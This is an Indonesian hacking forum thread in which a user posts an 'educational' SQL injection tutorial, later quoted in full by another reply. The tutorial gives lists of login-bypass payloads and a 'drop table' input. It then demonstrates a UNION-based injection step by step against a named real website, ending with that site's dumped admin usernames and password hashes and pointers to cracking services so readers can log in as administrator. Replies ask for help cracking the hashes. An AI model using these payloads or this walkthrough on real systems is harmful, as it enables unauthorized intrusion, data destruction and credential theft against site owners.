Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
IndeksLatest imagesPencarianPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Viagra Generico. prontuario viagra generico
www.signyband.com I_icon_minitimeThu Aug 04, 2011 1:31 pm by Tamu

» Nearly Half Of Residents In Nova Scotia Nursing Homes Display Behavioural Problems
www.signyband.com I_icon_minitimeThu Aug 04, 2011 11:24 am by Tamu

» русские мамки смотреть порно видео
www.signyband.com I_icon_minitimeThu Aug 04, 2011 6:27 am by Tamu

» Compra Viagra. acquistare sildenafil viagra generico
www.signyband.com I_icon_minitimeThu Aug 04, 2011 3:16 am by Tamu

» Compra Viagra. viagra generico acquisto
www.signyband.com I_icon_minitimeThu Aug 04, 2011 12:44 am by Tamu

» free casino online games
www.signyband.com I_icon_minitimeWed Aug 03, 2011 7:30 pm by Tamu

» Can Dogs Take Cough Medicine
www.signyband.com I_icon_minitimeWed Aug 03, 2011 6:14 pm by Tamu

» This forum back up me thanks
www.signyband.com I_icon_minitimeWed Aug 03, 2011 3:32 am by Tamu

» Some websites are starting to look wrong on Chrome?
www.signyband.com I_icon_minitimeTue Aug 02, 2011 6:02 pm by Tamu

Forum
Affiliates
   
milw0rm.com
 
Plankton
 
milw0rm.com
 
echo.or.id/
 

 

 www.signyband.com

Go down 
4 posters
PengirimMessage
plankton

plankton


Jumlah posting : 74
Points : 178
Join date : 28.05.09

www.signyband.com Empty
PostSubyek: www.signyband.com   www.signyband.com I_icon_minitimeWed Jun 10, 2009 8:49 am

*| SQl injection fro dummies
*| level basic
*| For educational

Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.

Biasanya Sql Injection dapat dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp

nah, jika pada page login itu terdapat statement

select id, user_name, password from user

maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statement result setnya sebagai berikut :

select id, user_name,password from user where name = 'Aurel' and password='password gw'

Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: Aurel';drop table user--
akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginnya

aduh.....pusing yah.....
langsung aja deh prakteknya...
kalo ada kesalahan input tersebut, maka pada halaman login tersebut kita bisa memasukkan variable sqlnya, yah dengan harapan sang admin nya ga pinter2
coba cari halaman login suatu site
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau

user:' or 1=1--
admin:' or 1=1--

variabel lainnya

or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a




waduh kok ga bisa yah uda?? ya iya lah Very Happy Very Happy
admin sekarang banyak dah pinter soal ginian dan sudah memfilter inputan tersebut.

so.....gimana lagi bobol website itu uda......

waduh.......ga satu jalan menuju ke roma bos..
masih banyak jalan tikus lainnya.


OK gimana kita lanjut ke session 2

nah dikarenakan sang admin udah memfilternya, kita coba cari jalan laennya.

ok deh, karena pembahasan ini mengenai SQL injection. maka harus cari korban juga neh. Twisted Evil Twisted Evil

btw, kita akan coba pada 1 situs ini

Code:
http://www.signyband.com



nah kita berusaha mencari vulnerable suatu situs.
buat mencari situs yg terindentifikasi kena penyakit ginian, maka kita kasi tanda quote '

nah penyakitnya udah kita ketemukan

Code:
http://www.signyband.com/news_detail.php?id=6'



nah maka akan tampil error kaya gini

result
invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

lanjutin dah
cari fieldnya dengan perintah order by

Code:
http://www.signyband.com/news_detail.php?id=-6 order by 10/**



trus keluarin angka Togelnya dengan perintah Union Select

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,3,4,5,6,7,8,9,10--



lah keluar tuh angka 3.... Very Happy
liat versi gunakan perintah version()

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10--



begitupun dengan database kita menggunakan perintah database ()

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,database(),4,5,6,7,8,9,10--



biar ga repot kita coba aja sekali tembak dengan perintah concat_ws dan buat pemisah kita bisa masukan sebagai pemisah 0x3a

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,concat_ws(version(),0x3a,database()),4,5,6,7,8,9,10--



keluar kan tuh
:5.0.32-Debian_7etch8t71732_signydb

Laughing ..................versi SQL 5 yah....lanjutin yuk...tanggung
keluarin dengan perintah table_name
syntaknya menjadi
union+select+no field+table_name+no field+from+information_schema.tables--

Code: Select all
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables--




last

Code: Select all
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,group_concat(username,0x3a,password),4,database(),6,7,8,9,10 from mod_tbluser--



admin:b44bb3b434b5b1d198a24667d58816818e9ce08a,signy:03d2e6ce2b16047d0bae8317b7ab8d82e3a6021b,slamet:7a85f4764bbd6daf1c3545efbbf0f279a6dc0beb

nah dapet tuh user ama passwordnya

tapi passwordnya masi di encrypt

nah buat decryptnya lo bisa cari di google.
kaya http://passcracking.com atau di http://milw0rm.com


nah setelah dapet decryptnya lo bisa masuk kehalaman login dengan bermodalkan username dan password tersebut..


so....kalo dah berhasil masuk kehalaman situs itu, lo dah punya hak akses sebagai administrator.


...wuahhhhh...............capek juga yah
dah mo subuh ne...
semoga tutorial ini bisa jadi sedikit panduan buat elo2 pada yg pengen tau

so.....use for educational and dont attack this website
Kembali Ke Atas Go down
http://forumplankton.co.cc
blackman

blackman


Jumlah posting : 36
Points : 44
Join date : 03.06.09
Age : 36
Lokasi : pekalongan

www.signyband.com Empty
PostSubyek: Re: www.signyband.com   www.signyband.com I_icon_minitimeWed Jun 10, 2009 12:59 pm

wow,,,brguna bgt bang...tpi cra nyari passwordnya gmn tu,,,gak donk,,,
Kembali Ke Atas Go down
plankton

plankton


Jumlah posting : 74
Points : 178
Join date : 28.05.09

www.signyband.com Empty
PostSubyek: Re: www.signyband.com   www.signyband.com I_icon_minitimeWed Jun 10, 2009 2:05 pm

blackman wrote:
wow,,,brguna bgt bang...tpi cra nyari passwordnya gmn tu,,,gak donk,,,


function md5(). Function ini sering digunakan para programmer untuk mengenkripsi password sebelum hasil enkripsi tersebut disimpan dalam database sistem, ketika registrasi user baru. Hasil enkripsi md5() berupa suatu string acak dengan panjang 32 karakter (256 bit).

nah buat decryptnya lo bisa cari di google.
kaya http://passcracking.com atau di http://milw0rm.com


albino albino albino study study
Kembali Ke Atas Go down
http://forumplankton.co.cc
blackman

blackman


Jumlah posting : 36
Points : 44
Join date : 03.06.09
Age : 36
Lokasi : pekalongan

www.signyband.com Empty
PostSubyek: Re: www.signyband.com   www.signyband.com I_icon_minitimeWed Jun 10, 2009 2:21 pm

plankton wrote:
blackman wrote:
wow,,,brguna bgt bang...tpi cra nyari passwordnya gmn tu,,,gak donk,,,


function md5(). Function ini sering digunakan para programmer untuk mengenkripsi password sebelum hasil enkripsi tersebut disimpan dalam database sistem, ketika registrasi user baru. Hasil enkripsi md5() berupa suatu string acak dengan panjang 32 karakter (256 bit).

nah buat decryptnya lo bisa cari di google.
kaya http://passcracking.com atau di http://milw0rm.com


albino albino albino study study

udah ak buka tu passcraking tpi gak tw crana gmn lgi,,,bingung... No No No No

gmpg deh tar lo ktemu aj,,, Smile Smile Smile
Kembali Ke Atas Go down
ria

ria


Jumlah posting : 25
Points : 47
Join date : 28.05.09

www.signyband.com Empty
PostSubyek: Re: www.signyband.com   www.signyband.com I_icon_minitimeThu Jun 11, 2009 7:02 am

plankton wrote:
*| SQl injection fro dummies
*| level basic
*| For educational

Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query'
dengan cara manipulasi data input ke applikasi tsb.

Biasanya Sql Injection dapat dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp

nah, jika pada page login itu terdapat statement

select id, user_name, password from user

maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statement result setnya sebagai berikut :

select id, user_name,password from user where name = 'Aurel' and password='password gw'

Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language"
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out'
dari delimiter nya SQL Jadi kalau misal ada inputan
User: Aurel';drop table user--
akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginnya

aduh.....pusing yah.....
langsung aja deh prakteknya...
kalo ada kesalahan input tersebut, maka pada halaman login tersebut kita bisa memasukkan variable sqlnya, yah dengan harapan sang admin nya ga pinter2
coba cari halaman login suatu site
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau

user:' or 1=1--
admin:' or 1=1--

variabel lainnya

or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a




waduh kok ga bisa yah uda?? ya iya lah Very Happy Very Happy
admin sekarang banyak dah pinter soal ginian dan sudah memfilter inputan tersebut.

so.....gimana lagi bobol website itu uda......

waduh.......ga satu jalan menuju ke roma bos..
masih banyak jalan tikus lainnya.


OK gimana kita lanjut ke session 2

nah dikarenakan sang admin udah memfilternya, kita coba cari jalan laennya.

ok deh, karena pembahasan ini mengenai SQL injection. maka harus cari korban juga neh. Twisted Evil Twisted Evil

btw, kita akan coba pada 1 situs ini

Code:
http://www.signyband.com



nah kita berusaha mencari vulnerable suatu situs.
buat mencari situs yg terindentifikasi kena penyakit ginian, maka kita kasi tanda quote '

nah penyakitnya udah kita ketemukan

Code:
http://www.signyband.com/news_detail.php?id=6'



nah maka akan tampil error kaya gini

result
invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

lanjutin dah
cari fieldnya dengan perintah order by

Code:
http://www.signyband.com/news_detail.php?id=-6 order by 10/**



trus keluarin angka Togelnya dengan perintah Union Select

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,3,4,5,6,7,8,9,10--



lah keluar tuh angka 3.... Very Happy
liat versi gunakan perintah version()

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10--



begitupun dengan database kita menggunakan perintah database ()

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,database(),4,5,6,7,8,9,10--



biar ga repot kita coba aja sekali tembak dengan perintah concat_ws dan buat pemisah kita bisa masukan sebagai pemisah 0x3a

Code:
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,concat_ws(version(),0x3a,database()),4,5,6,7,8,9,10--



keluar kan tuh
:5.0.32-Debian_7etch8t71732_signydb

Laughing ..................versi SQL 5 yah....lanjutin yuk...tanggung
keluarin dengan perintah table_name
syntaknya menjadi
union+select+no field+table_name+no field+from+information_schema.tables--

Code: Select all
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables--




last

Code: Select all
http://www.signyband.com/news_detail.php?id=-6 union select 1,2,group_concat(username,0x3a,password),4,database(),6,7,8,9,10 from mod_tbluser--



admin:b44bb3b434b5b1d198a24667d58816818e9ce08a,signy:03d2e6ce2b16047d0bae8317b7ab8d82e3a6021b,slamet:7a85f4764bbd6daf1c3545efbbf0f279a6dc0beb

nah dapet tuh user ama passwordnya

tapi passwordnya masi di encrypt

nah buat decryptnya lo bisa cari di google.
kaya http://passcracking.com atau di http://milw0rm.com


nah setelah dapet decryptnya lo bisa masuk kehalaman login dengan bermodalkan username dan password tersebut..


so....kalo dah berhasil masuk kehalaman situs itu, lo dah punya hak akses sebagai administrator.


...wuahhhhh...............capek juga yah
dah mo subuh ne...
semoga tutorial ini bisa jadi sedikit panduan buat elo2 pada yg pengen tau

so.....use for educational and dont attack this website


makasih infonya bang ...
Kembali Ke Atas Go down
elito




Jumlah posting : 2
Points : 2
Join date : 07.07.09

www.signyband.com Empty
PostSubyek: Re: www.signyband.com   www.signyband.com I_icon_minitimeWed Jul 08, 2009 11:57 pm

saya msh bingung gmn cara msk ke halaman login nya
saya coba ke web http://www.signyband.com di halaman login.asp gak boleh msk, tulisannya forbiden Sad

ada cara lain untuk msk ke halaman login admin??
Kembali Ke Atas Go down
Sponsored content





www.signyband.com Empty
PostSubyek: Re: www.signyband.com   www.signyband.com I_icon_minitime

Kembali Ke Atas Go down
 
www.signyband.com
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
 :: Hacking :: Web attack-
Navigasi: